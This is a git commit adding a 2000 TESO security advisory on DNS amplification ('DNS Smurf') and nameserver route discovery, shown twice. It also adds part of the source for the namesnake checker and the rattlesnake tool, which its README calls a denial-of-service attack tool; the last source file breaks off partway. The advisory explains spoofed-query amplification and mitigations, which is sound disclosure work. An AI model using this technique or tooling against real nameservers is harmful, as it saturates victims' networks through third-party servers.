initial

17 files changed, 3546 insertions, 0 deletions

diff --git a/advisories/teso-advisory-003/advisory-003.txt b/advisories/teso-advisory-003/advisory-003.txt
new file mode 100644
index 0000000..be6bc78
--- /dev/null
+++ b/advisories/teso-advisory-003/advisory-003.txt
@@ -0,0 +1,258 @@
+
+------
+
+TESO Security Advisory
+02/11/2000
+
+Nameserver traffic amplify (DNS Smurf) and NS Route discovery (DNS Traceroute)
+
+
+Summary
+===================
+
+    Nameservers which accept and forward external DNS queries may be abused
+    as traffic amplifiers, exposing a possible threat to network integrity
+    by bandwidth saturation (DNS Smurf).
+
+    A "deaf" pseudo nameserver may be used to discover the query chain a
+    DNS query takes through various nameservers, allowing to make a trace-
+    route like route discovery (DNS Traceroute).
+
+
+Systems Affected
+===================
+
+    All type of nameservers which accept external queries. Especially those,
+    which forward the queries to other nameservers or those which have
+    excessive retry attempt values. The common value is to try three times,
+    but we have observed misconfigured servers which tried more then 20 times
+    sending out a query packet.
+
+    Note that this attack is completely different from the DNS Smurf attack
+    discovered by s0ftpr0ject [4], however, it exploits weaknesses in default
+    BIND [6] configurations too.
+
+
+Tests
+===================
+
+    The following data is an except from initial tests we have conducted
+    against some vulnerable nameserver.
+
+    08:07:24.943598 ns2.domain > victim.domain: 15121 (35)
+    08:07:32.747253 ns3.domain > victim.domain: 8536 (35)
+    08:07:32.832604 ns2.domain > victim.domain: 15121 (35)
+    08:07:39.819289 ns3.domain > victim.domain: 8536 (35)
+    08:07:40.670228 ns1.1025 > victim.domain: 56483 (35)
+    08:07:44.405556 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:07:48.928981 ns2.domain > victim.domain: 15121 (35)
+    08:07:52.669825 ns1.1025 > victim.domain: 56483 (35)
+    08:07:56.107063 ns3.domain > victim.domain: 8536 (35)
+    08:07:56.471586 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:04.938187 ns6.domain > victim.domain: 26706 (35)
+    08:08:12.372097 ns5.2187 > victim.domain: 2352 (35)
+    08:08:13.826464 ns6.domain > victim.domain: 26706 (35)
+    08:08:16.669021 ns1.1025 > victim.domain: 56483 (35)
+    08:08:20.603050 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:24.365990 ns5.2187 > victim.domain: 2352 (35)
+    08:08:30.873233 ns6.domain > victim.domain: 26706 (35)
+      08:08:32.658479 ns1.domain > querier.1025: 298 ServFail 0/0/0 (35)
+    08:08:48.369725 ns5.2187 > victim.domain: 2352 (35)
+
+    The initial DNS query packet had a size of 35 bytes, although packets
+    up to a size of 500 bytes are possible.
+    As you can see there are five nameservers who indirectly got the query,
+    which was send by "querier" (query packet not displayed). The first name-
+    server that got queried was "ns1".
+
+    The query is forwarded to five other nameservers, so all together there are
+    six nameservers which try to resolve the query domain. If the query domain
+    is a normal existent domain name, the authoritative nameserver will answer
+    promptly and the answer is returned to the original query host.
+
+    This is the normal case. However, if there is an authoritative nameserver
+    which does not respond to the queries send to it, all nameservers will
+    retry to resolve the domain by sending out the query packet, assuming the
+    UDP packet they have previously sent got lost.
+    Because all six nameservers do this, this results in a traffic amplify
+    with factor 18 (18 packets send for each attacker packet).
+
+    Through testing a few hundred nameservers on this vulnerability we quickly
+    found nameservers which will amplify with ratios well beyond 30, sometimes
+    even exceeding 50.
+
+
+Impact
+===================
+
+    By abusing multiple nameserver-chains as traffic amplifiers an attacker can
+    easily saturate any network link. The traffic to the victim IP is caused by
+    the query packets which are sent by each nameserver in the nameserver-chain
+    to the fake authoritative nameserver in the victim network.
+
+    For the last few years denial of service (DoS) attacks that are based on
+    bandwidth saturation have always been a problem. A few years ago, when the
+    Smurf ICMP denial of service attack got publicly known nearly everyone was
+    able to saturate any link by abusing other networks as a traffic amplifier.
+    Since then numerous amplify attacks have been discovered, such as [3] and
+    [4], the original posting of the Smurf attack is [5].
+
+    Any method that allows an attacker to amplify his traffic can be abused for
+    a denial of service attack.
+
+
+Explanation
+===================
+
+    When a nameserver receives a query, most nameservers usually just start
+    forwarding the query to some other nameserver. There can be quite a long
+    path of forwarding queries. However if the query is not resolvable
+    because there is no nameserver listening on the remote host, every
+    forwarding nameserver will start to resolve it on their own, by querying
+    the authoritative nameserver themselves. In the default configuration each
+    nameserver will send the query three times, after 0, 12 and 24 seconds,
+    ymmv.
+
+    This can be used to discover the path of nameservers. To do this an
+    attacker would query the first nameserver for a domain he can see the
+    packets on, at best the domain points to the query host itself. Then he
+    would record all nameservers that send out a packet to himself. After
+    having done this he would try with another nameserver of the ones he got
+    queries from. In the best case he will receive queries from all hosts
+    but one missing. The missing one is the first host in the route. After
+    having reduced the list by one he will start over with the reduced list
+    until there is only one nameserver remaining, which is the last in the
+    querying chain.
+
+    Through seeking especially long paths, where a lot of nameservers are
+    queried, this can be abused as a traffic amplify bandwidth attack, as shown
+    above.
+
+    Since the important entries such as the NS entry is in the cache of each
+    nameserver after the first query, the attack is very fast pacing after the
+    first query, since no additional packets are sent to the attacker and the
+    attacker may spoof the UDP query packets. If the attacker is clever he
+    would use a very short lifetime for his NS entry, while using a long
+    lifetime for the victim subdomain. After the first query succeeded he will
+    just shut his nameserver down and send out spoofed query packets at a very
+    fast rate.
+
+
+Solution
+===================
+
+    "Defense is the best Offense" - said by a wise person. By protecting your
+    own nameservers against being abused by attackers you secure other sites at
+    the same time. If you run BIND [6] nameservers in your network please care
+    to read basic BIND configuration tutorials and especially documents on how
+    to secure your BIND configuration [7].
+
+    Also notice that you may fall victim to the same attack, if only one
+    nameserver in your network is vulnerable -- That means if only one
+    server is accepting queries for external domains from strangers, this
+    nameserver inside your network will send out trusted queries to other
+    nameservers in your network, and hence can be abused too.
+
+    By taking more generic measures against being the originator network of
+    denial of service attacks, such as improving your overall network security,
+    you contribute to the security of all other networks in the Internet too.
+    I urge you to subscribe to a security related mailing list, such as
+    Bugtraq [8] or, if you cannot afford the time necessary to read such a
+    list, at least subscribe to the CERT list [9].
+
+    In general there is no foolproof method to avoid getting a victim of a DNS
+    Smurf. But what can you do if you get attacked ?
+
+    To think of the correct response we have to think of why this attack works.
+    It works because other nameservers try to query a non-existent nameserver
+    in your network and don't get any response, hence retrying again. To just
+    filter DNS traffic to this IP is only of little use as a short-time
+    measure. Instead setting up a bogus DNS server on the victim IP address,
+    which replies with bogus answers to any query it receives will reduce the
+    impact of the attack.
+
+    However the real cause for the attack is still the number of misconfigured
+    DNS servers out there, which accept queries for external domains from
+    strangers. Another reason is the unreliable transport protocol which makes
+    it impossible for the nameserver to notice the unreachability of the remote
+    victim nameserver.
+
+
+Acknowledgments
+================
+
+    The bug discovery and the demonstration programs is due to TESO [1].
+
+    This advisory has been written by scut and hendy.
+    The tests and further analysis were done by scut.
+    The demonstration exploit has been written by scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@shellcode.org.
+    Our web page is at http://teso.scene.at/
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] Packetfactory
+        http://www.packetfactory.net/
+
+    [3] The "MAC DoS Attack", a x37 traffic amplify attack
+        posted on Bugtraq Mailing List 12/28/1999, discovered by John Copeland
+
+    [4] DNS Smurf (through query/answer ratio)
+        s0ftpr0ject Security Advisory SPJ-002-000, July 19, 1999
+        posted on Bugtraq Mailing List 07/30/1999, discovered by scacco
+
+    [5] ICMP ECHO Requests to Broadcast addresses (ICMP Smurf attack)
+        posted on Bugtraq Mailing List 07/19/1997, posting by Edward Henigin
+
+    [6] BIND nameserver software - Internet Software Consortium
+        http://www.isc.org/
+
+    [7] Securing Domain Name Service
+        Article on securityportal.com security related website
+        http://securityportal.com/cover/coverstory19990621.html
+
+    [8] Bugtraq Mailing List
+        http://www.securityfocus.com/about/feedback/subscribe-bugtraq.html
+
+    [9] CERT Mailing List
+        http://www.cert.org/contact_cert/certmaillist.html
+
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+    The program needs Libnet, a low level network library installed, which can
+    be obtained through [2].
+
+    The exploit is available from
+
+       http://teso.scene.at/
+
+------
+
+
diff --git a/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz b/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz
new file mode 100644
index 0000000..637bedc
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz
diff --git a/advisories/teso-advisory-003/namesnake/README b/advisories/teso-advisory-003/namesnake/README
new file mode 100644
index 0000000..448e2a3
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/README
@@ -0,0 +1,20 @@
+rattlesnake and namesnake
+by team teso
+
+read the advisory in doc/ before asking stupid questions.
+
+namesnake is a tool to check whether a nameserver can be abused as a traffic
+amplifier. it is not fast, in fact it is very slow. i could've done it very
+fast, but since you are only going to check your local servers anyway, you
+shouldn't care, do you ?
+
+rattlesnake is a denial of service attack tool used to produce queries.
+usage should be obvious, if not reread the advisory.
+
+btw, for the compilation, you have to have libnet 1.x installed. the
+compilation errors (random/srandom) are caused by invalid libnet headers,
+i hope they will be fixed soon, so don't bug me about it.
+
+regards,
+scut / teso
+
diff --git a/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt b/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt
new file mode 100644
index 0000000..be6bc78
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt
@@ -0,0 +1,258 @@
+
+------
+
+TESO Security Advisory
+02/11/2000
+
+Nameserver traffic amplify (DNS Smurf) and NS Route discovery (DNS Traceroute)
+
+
+Summary
+===================
+
+    Nameservers which accept and forward external DNS queries may be abused
+    as traffic amplifiers, exposing a possible threat to network integrity
+    by bandwidth saturation (DNS Smurf).
+
+    A "deaf" pseudo nameserver may be used to discover the query chain a
+    DNS query takes through various nameservers, allowing to make a trace-
+    route like route discovery (DNS Traceroute).
+
+
+Systems Affected
+===================
+
+    All type of nameservers which accept external queries. Especially those,
+    which forward the queries to other nameservers or those which have
+    excessive retry attempt values. The common value is to try three times,
+    but we have observed misconfigured servers which tried more then 20 times
+    sending out a query packet.
+
+    Note that this attack is completely different from the DNS Smurf attack
+    discovered by s0ftpr0ject [4], however, it exploits weaknesses in default
+    BIND [6] configurations too.
+
+
+Tests
+===================
+
+    The following data is an except from initial tests we have conducted
+    against some vulnerable nameserver.
+
+    08:07:24.943598 ns2.domain > victim.domain: 15121 (35)
+    08:07:32.747253 ns3.domain > victim.domain: 8536 (35)
+    08:07:32.832604 ns2.domain > victim.domain: 15121 (35)
+    08:07:39.819289 ns3.domain > victim.domain: 8536 (35)
+    08:07:40.670228 ns1.1025 > victim.domain: 56483 (35)
+    08:07:44.405556 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:07:48.928981 ns2.domain > victim.domain: 15121 (35)
+    08:07:52.669825 ns1.1025 > victim.domain: 56483 (35)
+    08:07:56.107063 ns3.domain > victim.domain: 8536 (35)
+    08:07:56.471586 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:04.938187 ns6.domain > victim.domain: 26706 (35)
+    08:08:12.372097 ns5.2187 > victim.domain: 2352 (35)
+    08:08:13.826464 ns6.domain > victim.domain: 26706 (35)
+    08:08:16.669021 ns1.1025 > victim.domain: 56483 (35)
+    08:08:20.603050 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:24.365990 ns5.2187 > victim.domain: 2352 (35)
+    08:08:30.873233 ns6.domain > victim.domain: 26706 (35)
+      08:08:32.658479 ns1.domain > querier.1025: 298 ServFail 0/0/0 (35)
+    08:08:48.369725 ns5.2187 > victim.domain: 2352 (35)
+
+    The initial DNS query packet had a size of 35 bytes, although packets
+    up to a size of 500 bytes are possible.
+    As you can see there are five nameservers who indirectly got the query,
+    which was send by "querier" (query packet not displayed). The first name-
+    server that got queried was "ns1".
+
+    The query is forwarded to five other nameservers, so all together there are
+    six nameservers which try to resolve the query domain. If the query domain
+    is a normal existent domain name, the authoritative nameserver will answer
+    promptly and the answer is returned to the original query host.
+
+    This is the normal case. However, if there is an authoritative nameserver
+    which does not respond to the queries send to it, all nameservers will
+    retry to resolve the domain by sending out the query packet, assuming the
+    UDP packet they have previously sent got lost.
+    Because all six nameservers do this, this results in a traffic amplify
+    with factor 18 (18 packets send for each attacker packet).
+
+    Through testing a few hundred nameservers on this vulnerability we quickly
+    found nameservers which will amplify with ratios well beyond 30, sometimes
+    even exceeding 50.
+
+
+Impact
+===================
+
+    By abusing multiple nameserver-chains as traffic amplifiers an attacker can
+    easily saturate any network link. The traffic to the victim IP is caused by
+    the query packets which are sent by each nameserver in the nameserver-chain
+    to the fake authoritative nameserver in the victim network.
+
+    For the last few years denial of service (DoS) attacks that are based on
+    bandwidth saturation have always been a problem. A few years ago, when the
+    Smurf ICMP denial of service attack got publicly known nearly everyone was
+    able to saturate any link by abusing other networks as a traffic amplifier.
+    Since then numerous amplify attacks have been discovered, such as [3] and
+    [4], the original posting of the Smurf attack is [5].
+
+    Any method that allows an attacker to amplify his traffic can be abused for
+    a denial of service attack.
+
+
+Explanation
+===================
+
+    When a nameserver receives a query, most nameservers usually just start
+    forwarding the query to some other nameserver. There can be quite a long
+    path of forwarding queries. However if the query is not resolvable
+    because there is no nameserver listening on the remote host, every
+    forwarding nameserver will start to resolve it on their own, by querying
+    the authoritative nameserver themselves. In the default configuration each
+    nameserver will send the query three times, after 0, 12 and 24 seconds,
+    ymmv.
+
+    This can be used to discover the path of nameservers. To do this an
+    attacker would query the first nameserver for a domain he can see the
+    packets on, at best the domain points to the query host itself. Then he
+    would record all nameservers that send out a packet to himself. After
+    having done this he would try with another nameserver of the ones he got
+    queries from. In the best case he will receive queries from all hosts
+    but one missing. The missing one is the first host in the route. After
+    having reduced the list by one he will start over with the reduced list
+    until there is only one nameserver remaining, which is the last in the
+    querying chain.
+
+    Through seeking especially long paths, where a lot of nameservers are
+    queried, this can be abused as a traffic amplify bandwidth attack, as shown
+    above.
+
+    Since the important entries such as the NS entry is in the cache of each
+    nameserver after the first query, the attack is very fast pacing after the
+    first query, since no additional packets are sent to the attacker and the
+    attacker may spoof the UDP query packets. If the attacker is clever he
+    would use a very short lifetime for his NS entry, while using a long
+    lifetime for the victim subdomain. After the first query succeeded he will
+    just shut his nameserver down and send out spoofed query packets at a very
+    fast rate.
+
+
+Solution
+===================
+
+    "Defense is the best Offense" - said by a wise person. By protecting your
+    own nameservers against being abused by attackers you secure other sites at
+    the same time. If you run BIND [6] nameservers in your network please care
+    to read basic BIND configuration tutorials and especially documents on how
+    to secure your BIND configuration [7].
+
+    Also notice that you may fall victim to the same attack, if only one
+    nameserver in your network is vulnerable -- That means if only one
+    server is accepting queries for external domains from strangers, this
+    nameserver inside your network will send out trusted queries to other
+    nameservers in your network, and hence can be abused too.
+
+    By taking more generic measures against being the originator network of
+    denial of service attacks, such as improving your overall network security,
+    you contribute to the security of all other networks in the Internet too.
+    I urge you to subscribe to a security related mailing list, such as
+    Bugtraq [8] or, if you cannot afford the time necessary to read such a
+    list, at least subscribe to the CERT list [9].
+
+    In general there is no foolproof method to avoid getting a victim of a DNS
+    Smurf. But what can you do if you get attacked ?
+
+    To think of the correct response we have to think of why this attack works.
+    It works because other nameservers try to query a non-existent nameserver
+    in your network and don't get any response, hence retrying again. To just
+    filter DNS traffic to this IP is only of little use as a short-time
+    measure. Instead setting up a bogus DNS server on the victim IP address,
+    which replies with bogus answers to any query it receives will reduce the
+    impact of the attack.
+
+    However the real cause for the attack is still the number of misconfigured
+    DNS servers out there, which accept queries for external domains from
+    strangers. Another reason is the unreliable transport protocol which makes
+    it impossible for the nameserver to notice the unreachability of the remote
+    victim nameserver.
+
+
+Acknowledgments
+================
+
+    The bug discovery and the demonstration programs is due to TESO [1].
+
+    This advisory has been written by scut and hendy.
+    The tests and further analysis were done by scut.
+    The demonstration exploit has been written by scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@shellcode.org.
+    Our web page is at http://teso.scene.at/
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] Packetfactory
+        http://www.packetfactory.net/
+
+    [3] The "MAC DoS Attack", a x37 traffic amplify attack
+        posted on Bugtraq Mailing List 12/28/1999, discovered by John Copeland
+
+    [4] DNS Smurf (through query/answer ratio)
+        s0ftpr0ject Security Advisory SPJ-002-000, July 19, 1999
+        posted on Bugtraq Mailing List 07/30/1999, discovered by scacco
+
+    [5] ICMP ECHO Requests to Broadcast addresses (ICMP Smurf attack)
+        posted on Bugtraq Mailing List 07/19/1997, posting by Edward Henigin
+
+    [6] BIND nameserver software - Internet Software Consortium
+        http://www.isc.org/
+
+    [7] Securing Domain Name Service
+        Article on securityportal.com security related website
+        http://securityportal.com/cover/coverstory19990621.html
+
+    [8] Bugtraq Mailing List
+        http://www.securityfocus.com/about/feedback/subscribe-bugtraq.html
+
+    [9] CERT Mailing List
+        http://www.cert.org/contact_cert/certmaillist.html
+
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+    The program needs Libnet, a low level network library installed, which can
+    be obtained through [2].
+
+    The exploit is available from
+
+       http://teso.scene.at/
+
+------
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/Makefile b/advisories/teso-advisory-003/namesnake/src/Makefile
new file mode 100644
index 0000000..5981e52
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/Makefile
@@ -0,0 +1,16 @@
+CFLAGS=-Wall -ggdb `libnet-config --defines`
+LIBS=-lnet
+CC=gcc
+OBJS=common.o dns-build.o dns.o io-udp.o network.o
+
+all:            namesnake rattlesnake
+
+clean:
+                rm -f *.o namesnake rattlesnake
+
+rattlesnake:    rattlesnake.c $(OBJS)
+                $(CC) $(CFLAGS) -static -o rattlesnake rattlesnake.c $(OBJS) $(LIBS)
+
+namesnake:      namesnake.c $(OBJS)
+                $(CC) $(CFLAGS) -o namesnake namesnake.c $(OBJS) $(LIBS)
+
diff --git a/advisories/teso-advisory-003/namesnake/src/common.c b/advisories/teso-advisory-003/namesnake/src/common.c
new file mode 100644
index 0000000..36391ad
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/common.c
@@ -0,0 +1,372 @@
+
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <time.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include "common.h"
+
+
+#ifdef  DEBUG
+void
+debugp (char *filename, const char *str, ...)
+{
+        FILE            *fp;    /* temporary file pointer */
+        va_list         vl;
+
+        fp = fopen (filename, "a");
+        if (fp == NULL)
+                return;
+
+        va_start (vl, str);
+        vfprintf (fp, str, vl);
+        va_end (vl);
+
+        fclose (fp);
+
+        return;
+}
+
+void
+hexdump (char *filename, unsigned char *data, unsigned int amount)
+{
+        FILE            *fp;    /* temporary file pointer */
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] = "................................ !\"#$%&'()*+,-./0123456789"
+                                        ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                                        "nopqrstuvwxyz{|}~...................................."
+                                        "....................................................."
+                                        "........................................";
+
+        fp = fopen (filename, "a");
+        if (fp == NULL)
+                return;
+
+        fprintf (fp, "\n-packet-\n");
+
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (fp, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (fp, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (fp, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (fp, "%c", trans[data[dp]]);
+                        fflush (fp);
+                        fprintf (fp, "\n");
+                }
+                fflush (fp);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (fp, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (fp, " ");
+                        fflush (fp);
+                }
+                fprintf (fp, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (fp, "%c", trans[data[dp]]);
+                fflush (fp);
+        }
+        fprintf (fp, "\n");
+
+        fclose (fp);
+        return;
+}
+
+#endif
+
+
+char **
+file_read (char *filename)
+{
+        char    buf[2048];
+        FILE    *fp;
+        char    **line_array = NULL;
+        int     ac = 0;
+        char    *c_p;
+
+        fp = fopen (filename, "r");
+        if (fp == NULL)
+                return (NULL);
+
+        memset (buf, '\0', sizeof (buf));
+        while (fgets (buf, sizeof (buf) - 1, fp) != NULL) {
+                line_array = xrealloc (line_array, (++ac + 1) * (sizeof (char *)));
+                line_array[ac] = NULL;  /* eoa ptr ss! */
+                for (c_p = (buf + sizeof (buf) - 1) ; c_p != buf ; c_p--) {
+                        if (*c_p == '\n')
+                                *c_p = '\0';
+                }
+                line_array[ac - 1] = xstrdup (buf);     /* hook em up */
+                memset (buf, '\0', sizeof (buf));
+        }
+        fclose (fp);
+
+        return (line_array);
+}
+
+
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+
+                return (0);
+        }
+
+        waitpid (pid, NULL, 0);
+
+        return (pid);
+}
+
+
+/* m_random
+ *
+ * return a random number between `lowmark' and `highmark'
+ */
+
+int
+m_random (int lowmark, int highmark)
+{
+        long int        rnd;
+
+        /* flip/swap them in case user messed up
+         */
+        if (lowmark > highmark) {
+                lowmark ^= highmark;
+                highmark ^= lowmark;
+                lowmark ^= highmark;
+        }
+        rnd = lowmark;
+
+        rnd += (random () % (highmark - lowmark));
+
+        /* this is lame, i know :)
+         */
+        return (rnd);
+}
+
+
+/* set_tv
+ *
+ * initializes a struct timeval pointed to by `tv' to a second value of
+ * `seconds'
+ *
+ * return in any case
+ */
+
+void
+set_tv (struct timeval *tv, int seconds)
+{
+        tv->tv_sec = seconds;
+        tv->tv_usec = 0;
+
+        return;
+}
+
+
+/* xstrupper
+ *
+ * uppercase a string `str'
+ *
+ * return in any case
+ */
+
+void
+xstrupper (char *str)
+{
+        for (; *str != '\0'; ++str) {
+                if (*str >= 'a' && *str <= 'z') {
+                        *str -= ('a' - 'A');
+                }
+        }
+
+        return;
+}
+
+
+/* concating snprintf
+ *
+ * determines the length of the string pointed to by `os', appending formatted
+ * string to a maximium length of `len'.
+ *
+ */
+
+void
+scnprintf (char *os, size_t len, const char *str, ...)
+{
+        va_list vl;
+        char    *ostmp = os + strlen (os);
+
+        va_start (vl, str);
+        vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
+        va_end (vl);
+
+        return;
+}
+
+unsigned long int
+tdiff (struct timeval *old, struct timeval *new)
+{
+        unsigned long int       time1;
+
+        if (new->tv_sec >= old->tv_sec) {
+                time1 = new->tv_sec - old->tv_sec;
+                if ((new->tv_usec - 500000) >= old->tv_usec)
+                        time1++;
+        } else {
+                time1 = old->tv_sec - new->tv_sec;
+                if ((old->tv_usec - 500000) >= new->tv_usec)
+                        time1++;
+        }
+
+        return (time1);
+}
+
+
+/* ipv4_print
+ *
+ * padding = 0 -> don't padd
+ * padding = 1 -> padd with zeros
+ * padding = 2 -> padd with spaces
+ */
+
+char *
+ipv4_print (char *dest, struct in_addr in, int padding)
+{
+        unsigned char   *ipp;
+
+        ipp = (unsigned char *) &in.s_addr;
+
+        strcpy (dest, "");
+
+        switch (padding) {
+        case (0):
+                sprintf (dest, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        case (1):
+                sprintf (dest, "%03d.%03d.%03d.%03d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        case (2):
+                sprintf (dest, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
+                break;
+        default:
+                break;
+        }
+
+        return (dest);
+}
+
+
+void *
+xrealloc (void *m_ptr, size_t newsize)
+{
+        void    *n_ptr;
+
+        n_ptr = realloc (m_ptr, newsize);
+        if (n_ptr == NULL) {
+                fprintf (stderr, "realloc failed\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (n_ptr);
+}
+
+
+char *
+xstrdup (char *str)
+{
+        char    *b;
+
+        b = strdup (str);
+        if (b == NULL) {
+                fprintf (stderr, "strdup failed\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (b);
+}
+
+
+void *
+xcalloc (int factor, size_t size)
+{
+        void    *bla;
+
+        bla = calloc (factor, size);
+
+        if (bla == NULL) {
+                fprintf (stderr, "no memory left\n");
+                exit (EXIT_FAILURE);
+        }
+
+        return (bla);
+}
+
+/* source by dk
+ */
+
+char *
+allocncat (char **to, char *from, size_t len)
+{
+        int rlen = strlen (from);
+        int null = *to == NULL;
+
+        len = rlen < len ? rlen : len;
+        *to = realloc (*to, (null ? 0 : strlen (*to)) + len + 1);
+        if (null)
+                **to = '\0';
+
+        if (*to == NULL)
+                perror ("no memory: ");
+
+        return (strncat (*to, from, len));
+}
+
+char *
+alloccat (char **to, char *from)
+{
+   return (allocncat (to, from, strlen (from)));
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/common.h b/advisories/teso-advisory-003/namesnake/src/common.h
new file mode 100644
index 0000000..0f41ca4
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/common.h
@@ -0,0 +1,31 @@
+
+#ifndef Z_COMMON_H
+#define Z_COMMON_H
+
+
+#include <sys/types.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+
+
+#ifdef  DEBUG
+void    debugp (char *filename, const char *str, ...);
+void    hexdump (char *filename, unsigned char *data, unsigned int amount);
+#endif
+char **                 file_read (char *filename);
+pid_t                   z_fork (void);
+int                     m_random (int lowmark, int highmark);
+void                    set_tv (struct timeval *tv, int seconds);
+void                    xstrupper (char *str);
+void                    scnprintf (char *os, size_t len, const char *str, ...);
+unsigned long int       tdiff (struct timeval *old, struct timeval *new);
+char                    *ipv4_print (char *dest, struct in_addr in, int padding);
+void                    *xrealloc (void *m_ptr, size_t newsize);
+char                    *xstrdup (char *str);
+void                    *xcalloc (int factor, size_t size);
+char                    *allocncat (char **to, char *from, size_t len);
+char                    *alloccat (char **to, char *from);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns-build.c b/advisories/teso-advisory-003/namesnake/src/dns-build.c
new file mode 100644
index 0000000..933db43
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns-build.c
@@ -0,0 +1,608 @@
+/* namesnake
+ *
+ * dns packet construction routines
+ * if you need some, just borrow here and drop me a line of credit :)
+ *
+ * by scut / teso
+ */
+
+#include <libnet.h>     /* route's owning library =) */
+#include <arpa/nameser.h>
+#include <netinet/in.h>
+#include <stdlib.h>
+#include <string.h>
+#include "common.h"
+#include "dns.h"
+#include "dns-build.h"
+#include "io-udp.h"
+#include "network.h"
+
+
+/* dns_build_random
+ *
+ * prequel the domain name `domain' with a random sequence of characters
+ * with a random length if len is zero, or a fixed length if len is != 0
+ *
+ * return the allocated new string
+ */
+
+char *
+dns_build_random (char *domain, size_t len)
+{
+        int     dlen, cc;
+        char    *pr;
+
+        cc = dlen = (len == 0) ? m_random (3, 16) : len;
+        pr = xcalloc (1, strlen (domain) + dlen + 2);
+        for (; dlen > 0; --dlen) {
+                char    p;
+
+                (int) p = m_random ((int) 'a', (int) 'z');
+                pr[dlen - 1] = p;
+        }
+        pr[cc] = '.';
+        memcpy (pr + cc + 1, domain, strlen (domain));
+
+        return (pr);
+}
+
+
+/* dns_domain
+ *
+ * return a pointer to the beginning of the SLD within a full qualified
+ * domain name `domainname'.
+ *
+ * return NULL on failure
+ * return a pointer to the beginning of the SLD on success
+ */
+
+char *
+dns_domain (char *domainname)
+{
+        char    *last_label = NULL,
+                *hold_label = NULL;
+
+        if (domainname == NULL)
+                return (NULL);
+
+        /* find last SLD
+         */
+        for (; *domainname != '\x00'; ++domainname) {
+                if (*domainname == '.') {
+                        last_label = hold_label;
+                        hold_label = domainname + 1;
+                }
+        }
+
+        return (last_label);
+}
+
+
+/*
+ * gets the domain of an in-addr.arpa string.
+ * 123.123.123.123.in-addr.arpa ==> 123.123.123.in-addr.arpa
+ * return a pointer inside arpaname on success
+ * return NULL on failure
+ */
+
+char *
+dns_ptr_domain (char *arpaname)
+{
+        char    *dot;
+
+        if (strstr (arpaname, "in-addr.arpa") == NULL)
+                return (NULL);
+
+        if (atoi (arpaname) == 0)
+                return (NULL);
+
+        dot = strchr (arpaname, '.');
+
+        return ((dot == NULL) ? NULL : (dot + 1));
+}
+
+
+/* dns_build_new
+ *
